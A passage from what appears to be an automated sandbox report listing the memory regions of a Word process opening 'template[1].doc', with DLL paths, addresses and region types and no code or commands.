"c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 405 start_va = 0x6a850000 end_va = 0x6a87bfff monitored = 0 entry_point = 0x6a8724b0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 406 start_va = 0x6a880000 end_va = 0x6a997fff monitored = 0 entry_point = 0x6a8840b1 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msptls.dll") Region: id = 407 start_va = 0x6a9a0000 end_va = 0x6a9e3fff monitored = 0 entry_point = 0x6a9baaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 408 start_va = 0x6a9f0000 end_va = 0x6a9fefff monitored = 0 entry_point = 0x6a9f2a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 409 start_va = 0x6aa00000 end_va = 0x6ad88fff monitored = 0 entry_point = 0x6aa9cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 410 start_va = 0x6ad90000 end_va = 0x6bb41fff monitored = 0 entry_point = 0x6ad91000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 411 start_va = 0x6bb50000 end_va = 0x6bb6cfff monitored = 0 entry_point = 0x6bb57240 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 412 start_va = 0x6bb70000 end_va = 0x6bb8ffff monitored = 0 entry_point = 0x6bb82810 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 413 start_va = 0x6bb90000 end_va = 0x6c127fff monitored = 0 entry_point = 0x6bb91000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 414 start_va = 0x6c130000 end_va = 0x6c844fff monitored = 0 entry_point = 0x6c131000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 415 start_va = 0x6c850000 end_va = 0x6cb51fff monitored = 0 entry_point = 0x6c851000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 416 start_va = 0x6cb60000 end_va = 0x6d751fff monitored = 0 entry_point = 0x6cb61000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\oart.dll") Region: id = 417 start_va = 0x6d760000 end_va = 0x6f3c1fff monitored = 0 entry_point = 0x6d761000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WWLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wwlib.dll") Region: id = 418 start_va = 0x6f3d0000 end_va = 0x6f51afff monitored = 0 entry_point = 0x6f431660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 419 start_va = 0x6f520000 end_va = 0x6f552fff monitored = 0 entry_point = 0x6f530e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 420 start_va = 0x6f560000 end_va = 0x6f569fff monitored = 0 entry_point = 0x6f563200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 421 start_va = 0x6f640000 end_va = 0x6f857fff monitored = 0 entry_point = 0x6f6e97b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 422 start_va = 0x6fe80000 end_va = 0x6fe85fff monitored = 0 entry_point = 0x6fe81490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 423 start_va = 0x6fe90000 end_va = 0x70064fff monitored = 0 entry_point = 0x6fe91000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 424 start_va = 0x70070000 end_va = 0x700dffff monitored = 0 entry_point = 0x700aec20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\SysWOW64\\msvcp140.dll" (normalized: "c:\\windows\\syswow64\\msvcp140.dll") Region: id = 425 start_va = 0x700e0000 end_va = 0x7024afff monitored = 0 entry_point = 0x7014e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 426 start_va = 0x70250000 end_va = 0x70330fff monitored = 0 entry_point = 0x7027e6b0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 427 start_va = 0x70340000 end_va = 0x70353fff monitored = 0 entry_point = 0x7034e290 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\SysWOW64\\vcruntime140.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140.dll") Region: id = 428 start_va = 0x70360000 end_va = 0x7038cfff monitored = 0 entry_point = 0x70372b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 429 start_va = 0x704f0000 end_va = 0x705bcfff monitored = 0 entry_point = 0x705429c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 430 start_va = 0x705c0000 end_va = 0x70666fff monitored = 0 entry_point = 0x705f6240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 431 start_va = 0x70670000 end_va = 0x70889fff monitored = 0 entry_point = 0x70705550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 432 start_va = 0x70c80000 end_va = 0x70d02fff monitored = 0 entry_point = 0x70ca37c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 433 start_va = 0x70d10000 end_va = 0x70f00fff monitored = 0 entry_point = 0x70df3cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 434 start_va = 0x70f10000 end_va = 0x7139dfff monitored = 0 entry_point = 0x7129a320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 435 start_va = 0x71540000 end_va = 0x7155afff monitored = 0 entry_point = 0x71549050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 436 start_va = 0x72c90000 end_va = 0x72cacfff monitored = 0 entry_point = 0x72c93b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 437 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 438 start_va = 0x72dd0000 end_va = 0x72fdefff monitored = 0 entry_point = 0x72e7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 439 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 440 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 441 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 442 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 443 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 444 start_va = 0x74340000 end_va = 0x743c3fff monitored = 0 entry_point = 0x74366220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 445 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 446 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 447 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 448 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 449 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 450 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 451 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 452 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 453 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 454 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 455 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 456 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 457 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 458 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 459 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 460 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 461 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 462 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 463 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 464 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 465 start_va = 0x77170000 end_va = 0x771c9fff monitored = 0 entry_point = 0x77197e70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 466 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 467 start_va = 0x7fea0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fea0000" filename = "" Region: id = 468 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 469 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 470 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 471 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 472 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 473 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 474 start_va = 0x71780000 end_va = 0x718fdfff monitored = 0 entry_point = 0x717fc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 475 start_va = 0x73b80000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73dbc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 476 start_va = 0x23f0000 end_va = 0x23f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023f0000" filename = "" Region: id = 477 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 478 start_va = 0x8050000 end_va = 0x80cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "template[1].doc56a357f129aea03f737cbd2a1761df32146ef69d93afc73dcdoccbd2a1761df32146ef69d93afc73dcdoc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\template[1].doc56a357f129aea03f737cbd2a1761df32146ef69d93afc73dcdoccbd2a1761df32146ef69d93afc73dcdoc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\template[1].doc56a357f129aea03f737cbd2a1761df32146ef69d93afc73dcdoccbd2a1761df32146ef69d93afc73dcdoc") Region: id = 479 start_va = 0x69590000 end_va = 0x69599fff monitored = 0 entry_point = 0x69592a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 480 start_va = 0x69590000 end_va = 0x69599fff monitored = 0 entry_point = 0x69592a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 481 start_va = 0x69590000 end_va = 0x6959bfff monitored = 0 entry_point = 0x695928fd region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 482 start_va = 0x69570000 end_va = 0x6958ffff monitored = 0 entry_point = 0x6957c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 483 start_va = 0x69560000 end_va = 0x69591fff monitored = 0 entry_point = 0x6957c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 484 start_va = 0x69540000 end_va = 0x6955ffff monitored = 0 entry_point = 0x6954c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 485 start_va = 0x69560000 end_va = 0x6959efff monitored = 0 entry_point = 0x69584c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 486 start_va = 0x69640000 end_va = 0x6965ffff monitored = 0 entry_point = 0x6964c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 487 start_va = 0x69620000 end_va = 0x69651fff monitored = 0 entry_point = 0x6963c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 488 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 489 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 490 start_va = 0x8050000 end_va = 0x80cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "template[1].doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\template[1].doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\template[1].doc") Region: id = 491 start_va = 0x69620000 end_va = 0x6965efff monitored = 0 entry_point = 0x69644c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 492 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 493 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 494 start_va = 0x2400000 end_va = 0x240efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "template[1].doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\template[1].doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\template[1].doc") Region: id = 495 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 496 start_va = 0x8050000 end_va = 0x80cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "template[1].doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\template[1].doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\template[1].doc") Region: id = 497 start_va = 0x69620000 end_va = 0x69651fff monitored = 0 entry_point = 0x6963c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 498 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 499 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 500 start_va = 0x8050000 end_va = 0x80cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "template[1].doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\template[1].doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\template[1].doc") Region: id = 501 start_va = 0x69620000 end_va = 0x6965efff monitored = 0 entry_point = 0x69644c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 502 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 503 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 504 start_va = 0x2400000 end_va = 0x240efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "template[1].doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\template[1].doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\template[1].doc") Region: id = 505 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 506 start_va = 0x8050000 end_va = 0x80cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "template[1].doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\template[1].doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\template[1].doc") Region: id = 507 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 508 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 509 start_va = 0x8050000 end_va = 0x80cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrf{dd672c71-a44b-425d-97e3-545ba26d44f4}.tmp" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\~WRF{DD672C71-A44B-425D-97E3-545BA26D44F4}.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\content.word\\~wrf{dd672c71-a44b-425d-97e3-545ba26d44f4}.tmp") Region: id = 510 start_va = 0x68670000 end_va = 0x688eefff monitored = 1 entry_point = 0x6870bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\PROGRA~2\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll") Region: id = 511 start_va = 0x695a0000 end_va = 0x6965efff monitored = 0 entry_point = 0x695b1dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\SysWOW64\\msvcr100.dll" (normalized: "c:\\windows\\syswow64\\msvcr100.dll") Region: id = 512 start_va = 0xcb00000 end_va = 0xcb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb00000" filename = "" Region: id = 513 start_va = 0x2400000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 514 start_va = 0x2400000 end_va = 0x2403fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 515 start_va = 0x8210000 end_va = 0x8254fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: 